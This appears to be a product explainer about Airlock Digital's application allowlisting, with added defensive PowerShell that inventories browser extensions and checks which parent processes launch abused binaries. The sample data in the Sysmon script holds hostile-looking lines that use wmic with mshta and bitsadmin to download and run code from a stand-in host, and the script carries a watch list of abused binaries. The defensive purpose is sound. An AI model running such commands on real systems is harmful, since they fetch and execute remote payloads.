Airlock Digital

What is it?

Airlock Digital is an application allowlisting platform for Windows and macOS. It enforces execution control by permitting only approved binaries to run. Unapproved code is blocked at execution time.

The platform provides policy management for enterprise deployments, including integration with software deployment tools (Intune, SCCM, Chocolatey) for automatic trust of deployed applications.

Why did they build it?

Modern attack chains rely on built-in Windows functionality. A typical sequence: phishing email delivers a password-protected ZIP containing an LNK file. The LNK calls BitsAdmin to download a batch file. The batch file executes VBScript, which calls an HTA file, which drops a DLL containing the malware payload. Each step uses signed Microsoft binaries.

EDR products attempt to detect these behavioral chains, but attackers iterate faster than detection rules. Allowlisting instead blocks the chain at the first unauthorized execution: if the batch file is not on the approved list, it never runs, and none of the subsequent steps execute.

The Windows attack surface keeps growing. Between Windows 10 LTSB and Windows 11 Enterprise there is roughly a 46% increase in files on disk. Recent Windows builds ship SSH, SCP, curl, tar, and 7-zip by default, all signed by Microsoft and all usable for lateral movement and data exfiltration.

How does Airlock Digital handle legitimate use of commonly-abused binaries?

The platform supports granular execution policies. Administrators can permit specific binaries to be called only by approved parent processes. For example: Intel’s diagnostic utility can call WMIC to retrieve BIOS information, while all other processes are blocked from invoking WMIC.
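The PowerShell below is an added example, not Airlock Digital's code or policy syntax. It shows the groundwork for the kind of rule described above: summarise which parent processes actually launch a set of commonly abused binaries, using Sysmon process-creation events (Event ID 1), then evaluate records against a parent-process allowlist so the resulting exceptions are driven by observed use rather than guesswork. The Intel utility path, the watch list and the sample records are constructed for illustration; the event-parsing function is for live use on a host running Sysmon.

```powershell
# Added example (not Airlock Digital's code): find out which parents launch
# commonly abused binaries before writing a parent-process rule for them.
# Input is Sysmon Event ID 1 (process creation); the sample records below are
# constructed so the script runs offline.

function ConvertFrom-SysmonProcessCreate {
    # Flatten a Sysmon Event ID 1 record into Image / ParentImage / CommandLine.
    param([Parameter(ValueFromPipeline)] $Event)
    process {
        $xml = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Image       = $data['Image']
            ParentImage = $data['ParentImage']
            CommandLine = $data['CommandLine']
        }
    }
}

function Get-AbusedBinaryParents {
    # Count (child, parent) pairs for the binaries we intend to restrict.
    # The default watch list is an assumption; take it from LOLBAS or the
    # Microsoft recommended block rules in practice.
    param(
        [Parameter(Mandatory)] [object[]] $Records,
        [string[]] $Watch = @('wmic.exe','bitsadmin.exe','mshta.exe','cscript.exe','wscript.exe','curl.exe')
    )
    $Records |
        Where-Object { $Watch -contains (Split-Path $_.Image -Leaf).ToLower() } |
        Group-Object { "$((Split-Path $_.Image -Leaf).ToLower())|$($_.ParentImage.ToLower())" } |
        ForEach-Object {
            $child, $parent = $_.Name -split '\|', 2
            [pscustomobject]@{ Child = $child; Parent = $parent; Count = $_.Count }
        } | Sort-Object Child, Count
}

function Test-ParentPolicy {
    # Evaluate one record against a parent-process allowlist: a restricted child
    # may run only when launched by one of its approved parents.
    param(
        [Parameter(Mandatory)] $Record,
        [Parameter(Mandatory)] [hashtable] $Policy   # child leaf name -> approved parent full paths
    )
    $child = (Split-Path $Record.Image -Leaf).ToLower()
    if (-not $Policy.ContainsKey($child)) { return 'NotRestricted' }
    if ($Policy[$child] -contains $Record.ParentImage.ToLower()) { return 'Allow' }
    return 'Block'
}

# Constructed sample records standing in for Sysmon output. The Intel path is hypothetical.
$sample = @(
    [pscustomobject]@{ Image='C:\Windows\System32\wbem\WMIC.exe'; ParentImage='c:\program files\intel\diag\intel-diag.exe'; CommandLine='wmic bios get serialnumber' }
    [pscustomobject]@{ Image='C:\Windows\System32\wbem\WMIC.exe'; ParentImage='c:\program files\intel\diag\intel-diag.exe'; CommandLine='wmic bios get version' }
    [pscustomobject]@{ Image='C:\Windows\System32\wbem\WMIC.exe'; ParentImage='c:\windows\system32\cmd.exe'; CommandLine='wmic process call create "mshta.exe http://example.invalid/x.hta"' }
    [pscustomobject]@{ Image='C:\Windows\System32\bitsadmin.exe'; ParentImage='c:\windows\explorer.exe'; CommandLine='bitsadmin /transfer j /download /priority normal http://example.invalid/a.bat C:\Users\Public\a.bat' }
    [pscustomobject]@{ Image='C:\Windows\System32\notepad.exe'; ParentImage='c:\windows\explorer.exe'; CommandLine='notepad.exe' }
)

# Policy mirroring the page's example: only the diagnostic utility may invoke WMIC.
$policy = @{ 'wmic.exe' = @('c:\program files\intel\diag\intel-diag.exe') }

Get-AbusedBinaryParents -Records $sample | Format-Table -AutoSize
$sample |
    ForEach-Object { [pscustomobject]@{ Image = $_.Image; Parent = $_.ParentImage; Verdict = (Test-ParentPolicy $_ $policy) } } |
    Format-Table -AutoSize

# Live use on a host with Sysmon installed (not run here):
# $live = Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-Sysmon/Operational'; Id=1 } -MaxEvents 5000 |
#         ConvertFrom-SysmonProcessCreate
# Get-AbusedBinaryParents -Records $live
```

With the sample data, the two Intel-launched WMIC invocations come back as Allow, the cmd.exe-launched one as Block, and bitsadmin and notepad as NotRestricted because the policy does not mention them. Running the summary over a few weeks of real Sysmon data is the quickest way to discover which business processes legitimately need each binary before the rule is enforced.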

This addresses the challenge Microsoft faces with deprecating functionality. WMIC was announced as deprecated in 2016 for Windows Server 2012. It will be disabled by default in the next Windows 11 version, with removal planned for a future release, a nearly decade-long timeline. Organizations cannot wait for Microsoft deprecation cycles to reduce attack surface.

How does the managed installer feature work?

Applications deployed through enterprise deployment tools (Intune, Chocolatey, SCCM) can be automatically added to the trust list without manual approval. The Airlock agent recognizes installations originating from these deployment systems and trusts the resulting binaries.

This reduces operational overhead for IT teams deploying new software. The trade-off: if the deployment infrastructure is compromised (or an attacker can publish to a package feed it pulls from), payloads pushed through those channels inherit the same trust. Organizations with elevated threat models should evaluate whether this trade-off is acceptable for their environment.

How does browser extension control function?

Version 5.32 added the ability to block users from installing browser extensions on Safari, Edge, Chrome, and Firefox across Windows and macOS. This prevents users from installing potentially malicious or data-exfiltrating extensions outside of organizational policy.
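As an added example (not Airlock Digital's code or mechanism), it helps to know what is already installed before turning on extension blocking. This PowerShell enumerates extensions from Chromium-based browser profiles on Windows: Chrome and Edge keep each extension's manifest.json under User Data\<profile>\Extensions\<id>\<version>. The set of permissions it flags as high-risk is an assumption for illustration, and the fixture it writes to a temp directory is constructed so the script runs offline; on a real host pass the user profile directories under C:\Users. Firefox stores add-on metadata differently (extensions.json) and is not covered here.

```powershell
# Added example (not Airlock Digital's code): inventory extensions already installed
# in Chromium-based browser profiles before enforcing extension control.

# Permissions treated as high-risk here are an assumption for illustration, not a standard.
$HighRiskPermissions = @('<all_urls>', 'webRequest', 'webRequestBlocking', 'cookies', 'history', 'nativeMessaging', 'debugger')

function Get-InstalledBrowserExtensions {
    param([Parameter(Mandatory)] [string[]] $ProfileRoots)  # user profile dirs, e.g. C:\Users\alice

    # Locations of Chrome and Edge user data relative to a Windows user profile.
    $browsers = @{
        Chrome = 'AppData\Local\Google\Chrome\User Data'
        Edge   = 'AppData\Local\Microsoft\Edge\User Data'
    }
    foreach ($root in $ProfileRoots) {
        foreach ($b in $browsers.GetEnumerator()) {
            $userData = Join-Path $root $b.Value
            if (-not (Test-Path $userData)) { continue }
            # Each browser profile ("Default", "Profile 1", ...) holds an Extensions folder.
            foreach ($profile in Get-ChildItem $userData -Directory) {
                $extRoot = Join-Path $profile.FullName 'Extensions'
                if (-not (Test-Path $extRoot)) { continue }
                foreach ($ext in Get-ChildItem $extRoot -Directory) {
                    foreach ($ver in Get-ChildItem $ext.FullName -Directory) {
                        $manifestPath = Join-Path $ver.FullName 'manifest.json'
                        if (-not (Test-Path $manifestPath)) { continue }
                        $m = Get-Content $manifestPath -Raw | ConvertFrom-Json
                        $perms = @($m.permissions) + @($m.host_permissions)
                        [pscustomobject]@{
                            User        = Split-Path $root -Leaf
                            Browser     = $b.Key
                            Profile     = $profile.Name
                            ExtensionId = $ext.Name
                            Version     = $ver.Name
                            Name        = $m.name      # may be a __MSG_*__ locale key for store extensions
                            HighRisk    = @($perms | Where-Object { $HighRiskPermissions -contains $_ })
                        }
                    }
                }
            }
        }
    }
}

# Constructed fixture so the example runs offline: one fake user with a Chrome
# profile holding two extensions (the IDs and names are made up).
$fixture   = Join-Path ([IO.Path]::GetTempPath()) 'ext-inventory-demo\alice'
$chromeExt = Join-Path $fixture 'AppData\Local\Google\Chrome\User Data\Default\Extensions'
$demo = @{
    'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' = @{ name = 'Demo Password Helper'; version = '1.0'; permissions = @('storage','cookies','webRequest'); host_permissions = @('<all_urls>') }
    'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb' = @{ name = 'Demo Dark Theme'; version = '2.3'; permissions = @('storage') }
}
foreach ($id in $demo.Keys) {
    $dir = Join-Path $chromeExt "$id\$($demo[$id].version)_0"
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    $demo[$id] | ConvertTo-Json | Set-Content (Join-Path $dir 'manifest.json')
}

Get-InstalledBrowserExtensions -ProfileRoots $fixture |
    Select-Object User, Browser, ExtensionId, Name, Version, @{ n = 'HighRisk'; e = { $_.HighRisk -join ',' } } |
    Format-Table -AutoSize

# On a real host (all local user profiles):
# Get-InstalledBrowserExtensions -ProfileRoots (Get-ChildItem C:\Users -Directory).FullName
```

Against the fixture, the password-helper extension is reported with cookies, webRequest and <all_urls> under HighRisk while the theme shows none. Collecting this inventory across a fleet before enforcement shows which extensions users depend on and therefore need to be approved, and which broad-permission ones are candidates for removal.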

What are the limitations?

Allowlisting controls code execution. It does not replace endpoint detection and response for post-exploitation detection, memory-based attacks, or behavioral analysis, and it does not by itself stop misuse of binaries that are already approved beyond what execution policies (such as parent-process constraints) restrict. The platform is designed to complement EDR, not replace it.

Risky Business appearances

Sources

Additional resources mentioned in interview

  • LOLBAS Project (lolbas-project.github.io): Community-maintained list of Windows binaries commonly abused by attackers
  • Microsoft recommended block rules: Microsoft’s list of utilities recommended for WDAC blocking
  • WinUtil (github.com/ChrisTitusTech/winutil): PowerShell scripts for removing Windows functionality not exposed through standard interfaces
  • DISM (Deployment Image Servicing and Management): Windows feature and package management, applied to an offline image at build time or to a running system
  • Windows LTSB/LTSC: Long-term servicing builds with reduced consumer functionality
  • Windows Server Core: Windows Server installation without the desktop shell, which removes much of the GUI-driven attack surface (Remote Desktop itself remains available on Server Core)